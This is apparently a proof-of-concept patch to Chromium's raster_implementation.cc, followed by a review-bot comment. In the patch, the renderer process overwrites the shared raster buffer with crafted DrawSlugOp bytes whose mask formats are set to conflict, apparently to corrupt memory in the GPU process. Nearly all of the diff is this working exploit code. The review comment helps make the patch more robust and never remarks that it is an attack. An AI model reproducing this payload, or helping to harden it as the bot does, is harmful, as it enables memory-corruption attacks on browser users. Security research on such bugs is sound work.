POC / raster_implementation.cc.patch PATCH
diff --git a/gpu/command_buffer/client/raster_implementation.cc b/gpu/command_buffer/client/raster_implementation.cc
index 89742900039a6..cbd9e5a974ee0 100644
--- a/gpu/command_buffer/client/raster_implementation.cc
+++ b/gpu/command_buffer/client/raster_implementation.cc
@@ -50,6 +50,9 @@
 #include "ui/gfx/geometry/rect.h"
 #include "ui/gfx/geometry/rect_f.h"
 
+
+#include "base/command_line.h"
+
 #if defined(GPU_CLIENT_DEBUG)
 #define GPU_CLIENT_SINGLE_THREAD_CHECK() SingleThreadChecker checker(this);
 #else  // !defined(GPU_CLIENT_DEBUG)
@@ -1110,8 +1113,114 @@ base::span<uint8_t> RasterImplementation::MapFontBuffer(uint32_t size) {
   return font_mapped_buffer_->as_byte_span();
 }
 
+// patch code
+bool IsRendererProcess(){
+  const char kProcessType[] = "type";
+  const char kRendererProcess[] = "renderer";
+  return base::CommandLine::ForCurrentProcess()->GetSwitchValueASCII(
+        kProcessType) == kRendererProcess;
+}
+
 void RasterImplementation::UnmapRasterCHROMIUM(uint32_t raster_written_size,
                                                uint32_t total_written_size) {
+  // patch code
+  if(IsRendererProcess()){
+    RasterImplementation* ri = this;
+    unsigned char* addr = (unsigned char*)(ri->raster_mapped_buffer_->address());
+    printf("[*] POC start execute UnmapRasterCHROMIUM type: %d\n", addr[0]);
+  
+#ifndef PocMaskFormat
+    enum class PocMaskFormat : int {
+      kA8,    //!< 1-byte per pixel
+      kA565,  //!< 2-bytes per pixel, RGB represent 3-channel LCD coverage
+      kARGB,  //!< 4-bytes per pixel, color format
+
+      kLast = kARGB
+    };
+#endif
+#ifndef PocFormat
+    enum PocFormat : uint8_t {
+      kBW_Format, //!< 1bit per pixel mask (e.g. monochrome)
+      kA8_Format, //!< 8bits per pixel mask (e.g. antialiasing)
+      k3D_Format, //!< 3 8bit per pixl planes: alpha, mul, add
+      kARGB32_Format,         //!< SkPMColor
+      kLCD16_Format,          //!< 565 alpha for r/g/b
+      kSDF_Format,            //!< 8bits representing signed distance field
+    };
+#endif
+
+    unsigned char serialized_data[] = {
+      // Header data 4 bytes
+      0x16, 0x30, 0x01, 0x00,   
+      // DrawSlugOp serialized data
+      // Op flags 52 bytes
+      0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x40, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x80, 0xbf,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00,
+      // Op count 4 bytes
+      0x01, 0x00, 0x00, 0x00,
+      // Op slug size 8 bytes
+      0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      // Op slug 236 bytes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x41, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x86, 0x07, 0xc2, 0x42, 0x4c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x63, 0x65, 0x72, 0x73,
+      0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x80, 0x41, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x10, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x99, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+
+      // Header data 4 bytes
+      0x16, 0x30, 0x01, 0x00,   
+      // DrawSlugOp serialized data
+      // Op flags 52 bytes
+      0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x40, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x80, 0xbf,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00,
+      // Op count 4 bytes
+      0x01, 0x00, 0x00, 0x00,
+      // Op slug size 8 bytes
+      0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      // Op slug 236 bytes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x41, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x86, 0x07, 0xc2, 0x42, 0x4c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x63, 0x65, 0x72, 0x73,
+      0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x80, 0x41, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x10, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x99, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+    };
+
+    UNSAFE_TODO(unsigned char* kDrawSlugOp1 = &serialized_data[0x44]);
+    UNSAFE_TODO(unsigned char* kDrawSlugOp2 = &serialized_data[0x130+0x44]);
+
+    UNSAFE_TODO(kDrawSlugOp1[0xd8] = PocFormat::kARGB32_Format);
+    UNSAFE_TODO(kDrawSlugOp1[0xe0] = 0x99);
+    UNSAFE_TODO(kDrawSlugOp1[0x48] = (unsigned char)PocMaskFormat::kARGB);
+    UNSAFE_TODO(kDrawSlugOp2[0x48] = (unsigned char)PocMaskFormat::kA8);
+    UNSAFE_TODO(memcpy(addr, serialized_data, sizeof(serialized_data)));
+    
+  }
+
+  // origin code
   if (!raster_mapped_buffer_) {
     SetGLError(GL_INVALID_OPERATION, "glUnmapRasterCHROMIUM", "not mapped");
     return;
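Review bot: The block added at the top of UnmapRasterCHROMIUM dereferences `raster_mapped_buffer_` (`ri->raster_mapped_buffer_->address()`) before the function's own `if (!raster_mapped_buffer_)` guard that follows it, so a call with nothing mapped reaches the read of `addr[0]` and the `memcpy` instead of the "not mapped" GL error. Changing the condition to `if (IsRendererProcess() && raster_mapped_buffer_) {`, or moving the block below the existing guard, keeps the instrumented build from faulting there. The `memcpy(addr, serialized_data, sizeof(serialized_data))` also copies the fixed-size array without comparing its size against the mapped buffer, and the `UNSAFE_TODO` wrappers appear only to mark the unsafe-buffer accesses rather than bound them, so a size comparison before the copy is still needed. The `#ifndef PocMaskFormat` and `#ifndef PocFormat` guards test for macros, not enum names, so they are always true and can be dropped. The function body continues outside the hunk.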